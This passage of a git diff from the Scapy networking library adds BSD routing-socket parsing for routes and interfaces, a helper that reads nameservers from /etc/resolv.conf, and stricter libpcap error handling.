"RTM_DELADDR", + 0x0E: "RTM_IFINFO", + 0x0F: "RTM_NEWMADDR", + 0x10: "RTM_DELMADDR", + 0x11: "RTM_IFANNOUNCE", + 0x12: "RTM_IEEE80211", + } + +_RTM_ADDRS = { + 0x01: "RTA_DST", + 0x02: "RTA_GATEWAY", + 0x04: "RTA_NETMASK", + 0x08: "RTA_GENMASK", + 0x10: "RTA_IFP", + 0x20: "RTA_IFA", + 0x40: "RTA_AUTHOR", + 0x80: "RTA_BRD", + 0x100: "RTA_SRC", + 0x200: "RTA_SRCMASK", + 0x400: "RTA_LABEL", + 0x800: "RTA_BFD", + 0x1000: "RTA_DNS", + 0x2000: "RTA_STATIC", + 0x4000: "RTA_SEARCH", +} + +_RTM_FLAGS = { + 0x01: "RTF_UP", + 0x02: "RTF_GATEWAY", + 0x04: "RTF_HOST", + 0x08: "RTF_REJECT", + 0x10: "RTF_DYNAMIC", + 0x20: "RTF_MODIFIED", + 0x40: "RTF_DONE", + 0x80: "RTF_MASK", # NetBSD + 0x100: "RTF_CONNECTED", # NetBSD + 0x200: "RTF_XRESOLVE", + 0x400: "RTF_LLDATA", + 0x800: "RTF_STATIC", + 0x1000: "RTF_BLACKHOLE", + 0x4000: "RTF_PROTO2", + 0x8000: "RTF_PROTO1", + **( + { + 0x10000: "RTF_PRCLONING", + 0x20000: "RTF_WASCLONED", + } + if DARWIN + else { + 0x10000: "RTF_SRC", # NetBSD + 0x20000: "RTF_ANNOUNCE", # NetBSD + } + ), + 0x40000: "RTF_PROTO3", + 0x80000: "RTF_FIXEDMTU", + 0x100000: "RTF_PINNED", + 0x200000: "RTF_LOCAL", + 0x400000: "RTF_BROADCAST", + 0x800000: "RTF_MULTICAST", + **( + { + 0x1000000: "RTF_IFSCOPE", + 0x2000000: "RTF_CONDEMNED", + 0x4000000: "RTF_IFREF", + 0x8000000: "RTF_PROXY", + 0x10000000: "RTF_ROUTER", + 0x20000000: "RTF_DEAD", + 0x40000000: "RTF_GLOBAL", + } + if DARWIN + else { + 0x1000000: "RTF_STICKY", + 0x4000000: "RTF_RNH_LOCKED", # deprecated + 0x8000000: "RTF_GWFLAG_COMPAT", + } + ), +} + +_IFCAP = { + 0x00000001: "IFCAP_CSUM_IPv4", + 0x00000002: "IFCAP_CSUM_TCPv4", + 0x00000004: "IFCAP_CSUM_UDPv4", + 0x00000010: "IFCAP_VLAN_MTU", + 0x00000020: "IFCAP_VLAN_HWTAGGING", + 0x00000080: "IFCAP_CSUM_TCPv6", + 0x00000100: "IFCAP_CSUM_UDPv6", + 0x00001000: "IFCAP_TSOv4", + 0x00002000: "IFCAP_TSOv6", + 0x00004000: "IFCAP_LRO", + 0x00008000: "IFCAP_WOL", +} + +# Common Header + + +class pfmsghdr(Packet): + fields_desc = [ + Field("rtm_msglen", 0, fmt="=H"), + ByteField("rtm_version", 5), + ByteEnumField("rtm_type", 0, _RTM_TYPE), + ] + ( + # It begins... the IFs apocalypse + [Field("rtm_hdrlen", 0, fmt="=H")] + if OPENBSD + else [] + ) + + if OPENBSD: + + def extract_padding(self, s: bytes) -> Tuple[bytes, Optional[bytes]]: + if self.rtm_msglen < 6: + return s, b"" + return s[: self.rtm_msglen - 6], s[self.rtm_msglen - 6 :] + + else: + + def extract_padding(self, s: bytes) -> Tuple[bytes, Optional[bytes]]: + if self.rtm_msglen < 4: + return s, b"" + return s[: self.rtm_msglen - 4], s[self.rtm_msglen - 4 :] + + +bind_layers(pfmsghdr, conf.raw_layer, rtm_msglen=0) # padding + + +# END + + +class sockaddr(Packet): + fields_desc = [ + # socket.h + ByteField("sa_len", 0), + ByteEnumField("sa_family", 0, socket.AddressFamily), + # sockaddr_in + ConditionalField( + Field("sin_port", 0, fmt="=H"), lambda pkt: pkt.sa_family == socket.AF_INET + ), + ConditionalField( + IPField("sin_addr", 0), lambda pkt: pkt.sa_family == socket.AF_INET + ), + ConditionalField( + StrFixedLenField("sin_zero", "", length=8), + lambda pkt: pkt.sa_family == socket.AF_INET and pkt.sa_len > 7, + ), + # sockaddr_in6 + ConditionalField( + Field("sin6_port", 0, fmt="=H"), + lambda pkt: pkt.sa_family == socket.AF_INET6, + ), + ConditionalField( + Field("sin6_flowinfo", 0, fmt="=I"), + lambda pkt: pkt.sa_family == socket.AF_INET6, + ), + ConditionalField( + IP6Field("sin6_addr", "::"), lambda pkt: pkt.sa_family == socket.AF_INET6 + ), + ConditionalField( + Field("sin6_scope_id", 0, fmt="=I"), + lambda pkt: pkt.sa_family == socket.AF_INET6, + ), + # sockaddr_dl + ConditionalField( + Field("sdl_index", 0, fmt="=H"), lambda pkt: pkt.sa_family == socket.AF_LINK + ), + ConditionalField( + Field("sdl_type", 0, fmt="=B"), lambda pkt: pkt.sa_family == socket.AF_LINK + ), + ConditionalField( + Field("sdl_nlen", 0, fmt="=B"), lambda pkt: pkt.sa_family == socket.AF_LINK + ), + ConditionalField( + Field("sdl_alen", 0, fmt="=B"), lambda pkt: pkt.sa_family == socket.AF_LINK + ), + ConditionalField( + Field("sdl_slen", 0, fmt="=B"), lambda pkt: pkt.sa_family == socket.AF_LINK + ), + ConditionalField( + StrLenField("sdl_iface", "", length_from=lambda pkt: pkt.sdl_nlen), + lambda pkt: pkt.sa_family == socket.AF_LINK, + ), + ConditionalField( + MultipleTypeField( + [(MACField("sdl_addr", None), lambda pkt: pkt.sdl_alen == 6)], + StrLenField("sdl_addr", "", length_from=lambda pkt: pkt.sdl_alen), + ), + lambda pkt: pkt.sa_family == socket.AF_LINK, + ), + ConditionalField( + StrLenField("sdl_sel", "", length_from=lambda pkt: pkt.sdl_slen), + lambda pkt: pkt.sa_family == socket.AF_LINK, + ), + ConditionalField( + XStrLenField( + "sdl_data", + "", + length_from=lambda pkt: max( + pkt.sa_len - pkt.sdl_nlen - pkt.sdl_alen - pkt.sdl_slen - 8, 0 + ), + ), + lambda pkt: pkt.sa_family == socket.AF_LINK, + ), + ConditionalField( + XStrLenField("sdl_pad", b"", length_from=lambda pkt: 16 - pkt.sa_len), + lambda pkt: pkt.sa_len < 16 and pkt.sa_family == socket.AF_LINK, + ), + # others + ConditionalField( + XStrLenField( + "sa_data", + "", + length_from=lambda pkt: pkt.sa_len - 2 if pkt.sa_len >= 2 else 0, + ), + lambda pkt: pkt.sa_family + not in [ + socket.AF_INET, + socket.AF_INET6, + socket.AF_LINK, + ], + ), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +class SockAddrsField(FieldListField): + holds_packets = 1 + + def __init__(self, name): + if DARWIN: + align = 4 + else: + align = 8 + super(SockAddrsField, self).__init__( + name, + [], + PadField(PacketField("", None, sockaddr), align), + ) + + +if OPENBSD: + + class if_data(Packet): + # net/if.h + fields_desc = [ + ByteField("ifi_type", 0), + ByteField("ifi_addrlen", 0), + ByteField("ifi_hdrlen", 0), + ByteField("ifi_link_state", 0), + Field("ifi_mtu", 0, fmt="=I"), + Field("ifi_metric", 0, fmt="=I"), + Field("ifi_rdomain", 0, fmt="=I"), + Field("ifi_baudrate", 0, fmt="=Q"), + Field("ifi_ipackets", 0, fmt="=Q"), + Field("ifi_ierrors", 0, fmt="=Q"), + Field("ifi_opackets", 0, fmt="=Q"), + Field("ifi_oerrors", 0, fmt="=Q"), + Field("ifi_collision", 0, fmt="=Q"), + Field("ifi_ibytes", 0, fmt="=Q"), + Field("ifi_obytes", 0, fmt="=Q"), + Field("ifi_imcasts", 0, fmt="=Q"), + Field("ifi_omcasts", 0, fmt="=Q"), + Field("ifi_iqdrops", 0, fmt="=Q"), + Field("ifi_oqdrops", 0, fmt="=Q"), + Field("ifi_noproto", 0, fmt="=Q"), + FlagsField( + "ifi_capabilities", + 0, + 32 if BIG_ENDIAN else -32, + _IFCAP, + ), + StrFixedLenField("ifi_lastchange", 0, length=16), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + +elif NETBSD: + + class if_data(Packet): + # net/if.h + fields_desc = [ + ByteField("ifi_type", 0), + ByteField("ifi_addrlen", 0), + ByteField("ifi_hdrlen", 0), + Field("ifi_link_state", 0, fmt="=I"), + Field("ifi_mtu", 0, fmt="=Q"), + Field("ifi_metric", 0, fmt="=Q"), + Field("ifi_baudrate", 0, fmt="=Q"), + Field("ifi_ipackets", 0, fmt="=Q"), + Field("ifi_ierrors", 0, fmt="=Q"), + Field("ifi_opackets", 0, fmt="=Q"), + Field("ifi_oerrors", 0, fmt="=Q"), + Field("ifi_collision", 0, fmt="=Q"), + Field("ifi_ibytes", 0, fmt="=Q"), + Field("ifi_obytes", 0, fmt="=Q"), + Field("ifi_imcasts", 0, fmt="=Q"), + Field("ifi_omcasts", 0, fmt="=Q"), + Field("ifi_iqdrops", 0, fmt="=Q"), + Field("ifi_noproto", 0, fmt="=Q"), + StrFixedLenField("ifi_lastchange", 0, length=16), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + +elif DARWIN: + + class if_data(Packet): + # if_var.h + fields_desc = [ + ByteField("ifi_type", 0), + ByteField("ifi_typelen", 0), + ByteField("ifi_physical", 0), + ByteField("ifi_addrlen", 0), + ByteField("ifi_hdrlen", 0), + ByteField("ifi_recvquota", 0), + ByteField("ifi_xmitquota", 0), + ByteField("ifi_unused", 0), + Field("ifi_mtu", 0, fmt="=I"), + Field("ifi_metric", 0, fmt="=I"), + Field("ifi_baudrate", 0, fmt="=I"), + Field("ifi_ipackets", 0, fmt="=I"), + Field("ifi_ierrors", 0, fmt="=I"), + Field("ifi_opackets", 0, fmt="=I"), + Field("ifi_oerrors", 0, fmt="=I"), + Field("ifi_collision", 0, fmt="=I"), + Field("ifi_ibytes", 0, fmt="=I"), + Field("ifi_obytes", 0, fmt="=I"), + Field("ifi_imcasts", 0, fmt="=I"), + Field("ifi_omcasts", 0, fmt="=I"), + Field("ifi_iqdrops", 0, fmt="=I"), + Field("ifi_noproto", 0, fmt="=I"), + Field("ifi_recvtiming", 0, fmt="=I"), + Field("ifi_xmittiming", 0, fmt="=I"), + Field("ifi_lastchange", 0, fmt="=Q"), + Field("ifi_unused2", 0, fmt="=I"), + Field("ifi_hwassist", 0, fmt="=I"), + Field("ifi_reserved", 0, fmt="=Q"), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + +else: + # FreeBSD + + class if_data(Packet): + # net/if.h + fields_desc = [ + ByteField("ifi_type", 0), + ByteField("ifi_physical", 0), + ByteField("ifi_addrlen", 0), + ByteField("ifi_hdrlen", 0), + ByteField("ifi_link_state", 0), + ByteField("ifi_vhid", 0), + Field("ifi_datalen", 0, fmt="=H"), + Field("ifi_mtu", 0, fmt="=I"), + Field("ifi_metric", 0, fmt="=I"), + Field("ifi_baudrate", 0, fmt="=Q"), + Field("ifi_ipackets", 0, fmt="=Q"), + Field("ifi_ierrors", 0, fmt="=Q"), + Field("ifi_opackets", 0, fmt="=Q"), + Field("ifi_oerrors", 0, fmt="=Q"), + Field("ifi_collision", 0, fmt="=Q"), + Field("ifi_ibytes", 0, fmt="=Q"), + Field("ifi_obytes", 0, fmt="=Q"), + Field("ifi_imcasts", 0, fmt="=Q"), + Field("ifi_omcasts", 0, fmt="=Q"), + Field("ifi_iqdrops", 0, fmt="=Q"), + Field("ifi_oqdrops", 0, fmt="=Q"), + Field("ifi_noproto", 0, fmt="=Q"), + Field("ifi_hwassist", 0, fmt="=Q"), + Field("tt", 0, fmt="=Q"), + StrFixedLenField("tv", 0, length=16), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +if OPENBSD: + + class if_msghdr(Packet): + fields_desc = [ + Field("ifm_index", 0, fmt="=H"), + Field("ifm_tableid", 0, fmt="=H"), + Field("_ifm_pad", 0, fmt="=H"), + FlagsField( + "ifm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + FlagsField( + "ifm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _bsd_iff_flags, + ), + Field("ifm_xflags", 0, fmt="=I"), + PadField( + PacketField("ifm_data", [], if_data), + 8, + ), + SockAddrsField("addrs"), + ] + +else: + + class if_msghdr(Packet): + fields_desc = [ + FlagsField( + "ifm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + FlagsField( + "ifm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _bsd_iff_flags, + ), + Field("ifm_index", 0, fmt="=H"), + Field("_ifm_spare1", 0, fmt="=H"), + PadField( + PacketField("ifm_data", [], if_data), + 8, + ), + SockAddrsField("addrs"), + ] + + +bind_layers(pfmsghdr, if_msghdr, rtm_type=0x0E) +if NETBSD: + bind_layers(pfmsghdr, if_msghdr, rtm_type=0x14) + + +if OPENBSD: + + class ifa_msghdr(Packet): + fields_desc = if_msghdr.fields_desc[:5] + [ + Field("ifam_metric", 0, fmt="=I"), + SockAddrsField("addrs"), + ] + +elif NETBSD: + + class ifa_msghdr(Packet): + fields_desc = [ + Field("ifm_index", 0, fmt="=H"), + Field("_rtm_spare1", 0, fmt="=H"), + FlagsField( + "ifm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _bsd_iff_flags, + ), + FlagsField( + "ifm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + Field("ifam_pid", 0, fmt="=I"), + Field("ifam_addrflags", 0, fmt="=I"), + PadField( + Field("ifam_metric", 0, fmt="=I"), + 8, + ), + SockAddrsField("addrs"), + ] + +else: # FreeBSD, Darwin + + class ifa_msghdr(Packet): + fields_desc = if_msghdr.fields_desc[:4] + [ + Field("ifam_metric", 0, fmt="=I"), + SockAddrsField("addrs"), + ] + + +bind_layers(pfmsghdr, ifa_msghdr, rtm_type=0x0C) +bind_layers(pfmsghdr, ifa_msghdr, rtm_type=0x0D) +if NETBSD: + bind_layers(pfmsghdr, ifa_msghdr, rtm_type=0x16) + bind_layers(pfmsghdr, ifa_msghdr, rtm_type=0x17) + + +class ifma_msghdr(Packet): + fields_desc = if_msghdr.fields_desc[:4] + + +bind_layers(pfmsghdr, ifma_msghdr, rtm_type=0x0F) +bind_layers(pfmsghdr, ifma_msghdr, rtm_type=0x10) + + +class if_announcemsghdr(Packet): + fields_desc = [ + Field("ifan_index", 0, fmt="=H"), + StrField("ifan_name", ""), + Field("ifan_what", 0, fmt="=H"), + ] + + +bind_layers(pfmsghdr, ifma_msghdr, rtm_type=0x11) + + +if OPENBSD: + + class rt_metrics(Packet): + fields_desc = [ + Field("rmx_pksent", 0, fmt="=Q"), + Field("rmx_expire", 0, fmt="=q"), + Field("rmx_locks", 0, fmt="=I"), + Field("rmx_mtu", 0, fmt="=I"), + Field("rmx_refcnt", 0, fmt="=I"), + Field("rmx_hopcount", 0, fmt="=I"), + Field("rmx_recvpipe", 0, fmt="=I"), + Field("rmx_sendpipe", 0, fmt="=I"), + Field("rmx_sshthresh", 0, fmt="=I"), + Field("rmx_rtt", 0, fmt="=I"), + Field("rmx_rttvar", 0, fmt="=I"), + Field("rmx_pad", 0, fmt="=I"), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + +elif NETBSD: + + class rt_metrics(Packet): + fields_desc = [ + Field("rmx_locks", 0, fmt="=Q"), + Field("rmx_mtu", 0, fmt="=Q"), + Field("rmx_hopcount", 0, fmt="=Q"), + Field("rmx_recvpipe", 0, fmt="=Q"), + Field("rmx_sendpipe", 0, fmt="=Q"), + Field("rmx_sshthresh", 0, fmt="=Q"), + Field("rmx_rtt", 0, fmt="=Q"), + Field("rmx_rttvar", 0, fmt="=Q"), + Field("rmx_expire", 0, fmt="=Q"), + Field("rmx_pksent", 0, fmt="=Q"), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + +elif DARWIN: + + class rt_metrics(Packet): + fields_desc = [ + Field("rmx_locks", 0, fmt="=I"), + Field("rmx_mtu", 0, fmt="=I"), + Field("rmx_hopcount", 0, fmt="=I"), + Field("rmx_expire", 0, fmt="=i"), + Field("rmx_recvpipe", 0, fmt="=I"), + Field("rmx_sendpipe", 0, fmt="=I"), + Field("rmx_sshthresh", 0, fmt="=I"), + Field("rmx_rtt", 0, fmt="=I"), + Field("rmx_rttvar", 0, fmt="=I"), + Field("rmx_pksent", 0, fmt="=I"), + StrFixedLenField("rmx_filler", b"", length=16), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + +else: + + class rt_metrics(Packet): + fields_desc = [ + Field("rmx_locks", 0, fmt="=Q"), + Field("rmx_mtu", 0, fmt="=Q"), + Field("rmx_hopcount", 0, fmt="=Q"), + Field("rmx_expire", 0, fmt="=Q"), + Field("rmx_recvpipe", 0, fmt="=Q"), + Field("rmx_sendpipe", 0, fmt="=Q"), + Field("rmx_sshthresh", 0, fmt="=Q"), + Field("rmx_rtt", 0, fmt="=Q"), + Field("rmx_rttvar", 0, fmt="=Q"), + Field("rmx_pksent", 0, fmt="=Q"), + Field("rmx_weight", 0, fmt="=Q"), + Field("rmx_nhidx", 0, fmt="=Q"), + StrFixedLenField("rmx_filler", b"", length=16), + ] + + def default_payload_class(self, payload: bytes) -> Type[Packet]: + return conf.padding_layer + + +if OPENBSD: + + class rt_msghdr(Packet): + fields_desc = [ + Field("rtm_index", 0, fmt="=H"), + Field("rtm_tableid", 0, fmt="=H"), + ByteField("rtm_priority", 0), + ByteField("rtm_mpls", 0), + FlagsField( + "rtm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + FlagsField( + "rtm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_FLAGS, + ), + Field("rtm_fmask", 0, fmt="=I"), + Field("rtm_pid", 0, fmt="=I"), + Field("rtm_seq", 0, fmt="=I"), + Field("rtm_errno", 0, fmt="=I"), + Field("rtm_inits", 0, fmt="=I"), + PadField( + PacketField("rtm_rmx", rt_metrics(), rt_metrics), + 8, + ), + SockAddrsField("addrs"), + ] + +elif NETBSD: + + class rt_msghdr(Packet): + fields_desc = [ + Field("rtm_index", 0, fmt="=H"), + Field("_rtm_spare1", 0, fmt="=H"), + FlagsField( + "rtm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_FLAGS, + ), + FlagsField( + "rtm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + Field("rtm_pid", 0, fmt="=I"), + Field("rtm_seq", 0, fmt="=I"), + Field("rtm_errno", 0, fmt="=I"), + Field("rtm_use", 0, fmt="=I"), + PadField( + Field("rtm_inits", 0, fmt="=I"), + 8, + ), + PadField( + PacketField("rtm_rmx", rt_metrics(), rt_metrics), + 8, + ), + SockAddrsField("addrs"), + ] + +elif DARWIN: + + class rt_msghdr(Packet): + # actually rt_msghdr2 (we need parentflags) + fields_desc = [ + Field("rtm_index", 0, fmt="=H"), + Field("_rtm_spare1", 0, fmt="=H"), + FlagsField( + "rtm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_FLAGS, + ), + FlagsField( + "rtm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + Field("rtm_refcnt", 0, fmt="=I"), + FlagsField( + "rtm_parentflags", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_FLAGS, + ), + Field("rtm_reserved", 0, fmt="=I"), + Field("rtm_use", 0, fmt="=I"), + Field("rtm_inits", 0, fmt="=I"), + PadField( + PacketField("rtm_rmx", rt_metrics(), rt_metrics), + 4, + ), + SockAddrsField("addrs"), + ] + +else: + + class rt_msghdr(Packet): + fields_desc = [ + Field("rtm_index", 0, fmt="=H"), + Field("_rtm_spare1", 0, fmt="=H"), + FlagsField( + "rtm_flags", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_FLAGS, + ), + FlagsField( + "rtm_addrs", + 0, + 32 if BIG_ENDIAN else -32, + _RTM_ADDRS, + ), + Field("rtm_pid", 0, fmt="=I"), + Field("rtm_seq", 0, fmt="=I"), + Field("rtm_errno", 0, fmt="=I"), + Field("rtm_fmask", 0, fmt="=I"), + Field("rtm_inits", 0, fmt="=Q"), + PadField( + PacketField("rtm_rmx", rt_metrics(), rt_metrics), + 8, + ), + SockAddrsField("addrs"), + ] + + +bind_layers(pfmsghdr, rt_msghdr) # else + + +class pfmsghdrs(Packet): + fields_desc = [ + PacketListField( + "msgs", + [], + pfmsghdr, + # 65535 / len(pfmsghdr) + max_count=4096, + ), + ] + + +# Utils + +CTL_NET = 4 +if DARWIN: + NET_RT_DUMP = 7 # NET_RT_DUMP2 +else: + NET_RT_DUMP = 1 +NET_RT_TABLE = 5 +if NETBSD: + NET_RT_IFLIST = 6 +else: + NET_RT_IFLIST = 3 + + +def _sr1_bsdsysctl(mib) -> List[Packet]: + """ + Send / Receive a BSD sysctl + """ + # Request routes + # 1. estimate needed size + oldplen = ctypes.c_size_t() + r = LIBC.sysctl( + mib, + len(mib), + None, + ctypes.byref(oldplen), + None, + 0, + ) + if r != 0: + return None + # 2. ask for real + oldp = ctypes.create_string_buffer(oldplen.value) + r = LIBC.sysctl( + mib, + len(mib), + oldp, + ctypes.byref(oldplen), + None, + 0, + ) + if r != 0: + return None + # Parse response + return pfmsghdrs(bytes(oldp)) + + +def read_routes(): + """ + Read the IPv4 routes using PF_ROUTE + """ + mib = [ + CTL_NET, + socket.PF_ROUTE, + 0, + int(socket.AF_INET), + NET_RT_DUMP, + 0, + ] + if not NETBSD and not DARWIN: + # NetBSD / OSX is missing the fib + if OPENBSD: + fib = 0 # default table + else: # FreeBSD + fib = -1 # means 'all' + mib.append(fib) + mib = (ctypes.c_int * len(mib))(*mib) + resp = _sr1_bsdsysctl(mib) + if not resp: + return [] + ifaces = _get_if_list() + routes = [] + for msg in resp.msgs: + if msg.rtm_type != 0x4 and (not DARWIN or msg.rtm_type != 0x14): # RTM_GET(2) + continue + # Parse route. addrs contains what addresses are present + flags = msg.rtm_flags + if not flags.RTF_UP: + continue + if DARWIN and flags.RTF_WASCLONED and msg.rtm_parentflags.RTF_PRCLONING: + # OSX needs filtering + continue + addrs = msg.rtm_addrs + net = 0 + mask = 0xFFFFFFFF + gw = 0 + iface = "" + addr = "" + metric = 1 + i = 0 + try: + if addrs.RTA_DST: + net = atol(msg.addrs[i].sin_addr) + i += 1 + if addrs.RTA_GATEWAY: + if msg.addrs[i].sa_family == socket.AF_LINK: + gw = "0.0.0.0" + else: + gw = msg.addrs[i].sin_addr or "0.0.0.0" + i += 1 + if addrs.RTA_NETMASK: + nm = msg.addrs[i] + if nm.sa_family == socket.AF_INET: + mask = atol(nm.sin_addr) + elif nm.sa_family in [0x00, 0xFF]: # NetBSD + mask = struct.unpack(" Dict[int, Dict[str, Any]] + """ + Read the interfaces list using a PF_ROUTE socket. + """ + mib = (ctypes.c_int * 6)( + CTL_NET, + socket.PF_ROUTE, + 0, + int(socket.AF_UNSPEC), + NET_RT_IFLIST, + 0, + ) + resp = _sr1_bsdsysctl(mib) + if not resp: + return {} + lifips = {} + for msg in resp.msgs: + if msg.rtm_type not in [0x0C, 0x16]: # RTM_NEWADDR + continue + if not msg.ifm_addrs.RTA_IFA: + continue + ifindex = msg.ifm_index + addrindex = ( + msg.ifm_addrs.RTA_DST + + msg.ifm_addrs.RTA_GATEWAY + + msg.ifm_addrs.RTA_NETMASK + + msg.ifm_addrs.RTA_GENMASK + ) + addr = msg.addrs[addrindex] + if addr.sa_family not in [socket.AF_INET, socket.AF_INET6]: + continue + data = { + "af_family": addr.sa_family, + "index": ifindex, + "address": addr.sin_addr, + } + if addr.sa_family == socket.AF_INET: # ipv4 + data["address"] = addr.sin_addr + else: # ipv6 + data.update( + { + "address": addr.sin6_addr, + "scope": in6_getscope(addr.sin6_addr), + } + ) + lifips.setdefault(ifindex, list()).append(data) + interfaces = {} + for msg in resp.msgs: + if msg.rtm_type != 0xE and (not NETBSD or msg.rtm_type != 0x14): # RTM_IFINFO + continue + ifindex = msg.ifm_index + ifname = None + mac = "00:00:00:00:00:00" + ifflags = msg.ifm_flags + ips = [] + for addr in msg.addrs: + if addr.sa_family == socket.AF_LINK: + ifname = addr.sdl_iface.decode() + if addr.sdl_addr: + mac = addr.sdl_addr + if ifname is not None: + if ifindex in lifips: + ips = lifips[ifindex] + interfaces[ifindex] = { + "name": ifname, + "index": ifindex, + "flags": ifflags, + "mac": mac, + "ips": ips, + } + return interfaces diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 3789c4583b3..0b76644444b 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -116,6 +116,7 @@ def __init__(self, self.fd_flags = None # type: Optional[int] self.type = type + self.bpf_fd = -1 # SuperSocket mandatory variables if promisc is None: diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 95d192bf983..c2c8897ce8c 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -7,12 +7,13 @@ Functions common to different architectures """ -import socket import ctypes +import re +import socket from scapy.config import conf from scapy.data import MTU, ARPHDR_ETHER, ARPHRD_TO_DLT -from scapy.error import Scapy_Exception +from scapy.error import Scapy_Exception, warning from scapy.interfaces import network_name, resolve_iface, NetworkInterface from scapy.libs.structures import bpf_program from scapy.pton_ntop import inet_pton @@ -21,6 +22,7 @@ # Type imports import scapy from typing import ( + List, Optional, Union, ) @@ -97,9 +99,8 @@ def compile_filter(filter_exp, # type: str ) iface = conf.iface # Try to guess linktype to avoid requiring root - from scapy.arch import get_if_raw_hwaddr try: - arphd = get_if_raw_hwaddr(iface)[0] + arphd = resolve_iface(iface).type linktype = ARPHRD_TO_DLT.get(arphd) except Exception: # Failed to use linktype: use the interface @@ -128,3 +129,18 @@ def compile_filter(filter_exp, # type: str "Failed to compile filter expression %s (%s)" % (filter_exp, ret) ) return bpf + + +####### +# DNS # +####### + +def read_nameservers() -> List[str]: + """Return the nameservers configured by the OS + """ + try: + with open('/etc/resolv.conf', 'r') as fd: + return re.findall(r"nameserver\s+([^\s]+)", fd.read()) + except FileNotFoundError: + warning("Could not retrieve the OS's nameserver !") + return [] diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 95d4c4f5119..80816a9083e 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -16,7 +16,7 @@ from scapy.automaton import select_objects from scapy.compat import raw, plain_str from scapy.config import conf -from scapy.consts import WINDOWS +from scapy.consts import WINDOWS, LINUX, BSD, SOLARIS from scapy.data import ( DLT_RAW_ALT, DLT_RAW, @@ -217,6 +217,7 @@ def load_winpcapy(): flags = p.contents.flags # FLAGS ips = [] mac = "" + itype = -1 a = p.contents.addresses while a: # IPv4 address @@ -244,7 +245,7 @@ def load_winpcapy(): ips.append(addr) a = a.contents.next flags = FlagValue(flags, _pcap_if_flags) - if_list[name] = (description, ips, flags, mac) + if_list[name] = (description, ips, flags, mac, itype) p = p.contents.next conf.cache_pcapiflist = if_list except Exception: @@ -297,15 +298,13 @@ def __init__(self, network_name(device).encode("utf8") ) self.dtl = -1 - if monitor: + if not WINDOWS or conf.use_npcap: from scapy.libs.winpcapy import pcap_create self.pcap = pcap_create(self.iface, self.errbuf) if not self.pcap: error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) if error: raise OSError(error) - if WINDOWS and not conf.use_npcap: - raise OSError("On Windows, this feature requires NPcap !") # Non-winpcap functions from scapy.libs.winpcapy import ( pcap_set_snaplen, @@ -316,11 +315,27 @@ def __init__(self, pcap_statustostr, pcap_geterr, ) - pcap_set_snaplen(self.pcap, snaplen) - pcap_set_promisc(self.pcap, promisc) - pcap_set_timeout(self.pcap, to_ms) - if pcap_set_rfmon(self.pcap, 1) != 0: - log_runtime.error("Could not set monitor mode") + if pcap_set_snaplen(self.pcap, snaplen) != 0: + error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) + if error: + raise OSError(error) + log_runtime.error("Could not set snaplen") + if pcap_set_promisc(self.pcap, promisc) != 0: + error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) + if error: + raise OSError(error) + log_runtime.error("Could not set promisc") + if pcap_set_timeout(self.pcap, to_ms) != 0: + error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) + if error: + raise OSError(error) + log_runtime.error("Could not set timeout") + if monitor: + if pcap_set_rfmon(self.pcap, 1) != 0: + error = decode_locale_str(bytearray(self.errbuf).strip(b"\x00")) + if error: + raise OSError(error) + log_runtime.error("Could not set monitor mode") status = pcap_activate(self.pcap) # status == 0 means success # status < 0 means error @@ -350,6 +365,8 @@ def __init__(self, errmsg = "%s: %s" % (iface, statusstr) raise OSError(errmsg) else: + if WINDOWS and monitor: + raise OSError("On Windows, this feature requires NPcap !") self.pcap = pcap_open_live(self.iface, snaplen, promisc, to_ms, self.errbuf) @@ -454,27 +471,23 @@ def load(self): data = {} i = 0 for ifname, dat in conf.cache_pcapiflist.items(): - description, ips, flags, mac = dat + description, ips, flags, mac, itype = dat i += 1 - if not mac: - from scapy.arch import get_if_hwaddr + if LINUX or BSD or SOLARIS and not mac: + from scapy.arch.unix import get_if_raw_hwaddr try: - mac = get_if_hwaddr(ifname) - except Exception as ex: + itype, _mac = get_if_raw_hwaddr(ifname) + mac = str2mac(_mac) + except Exception: # There are at least 3 different possible exceptions - log_loading.warning( - "Could not get MAC address of interface '%s': %s." % ( - ifname, - ex, - ) - ) - continue + mac = "00:00:00:00:00:00" if_data = { 'name': ifname, 'description': description or ifname, 'network_name': ifname, 'index': i, 'mac': mac, + 'type': itype, 'ips': ips, 'flags': flags } diff --git a/scapy/arch/linux/__init__.py b/scapy/arch/linux/__init__.py index 86c8e92f826..03dc3e7d9cf 100644 --- a/scapy/arch/linux/__init__.py 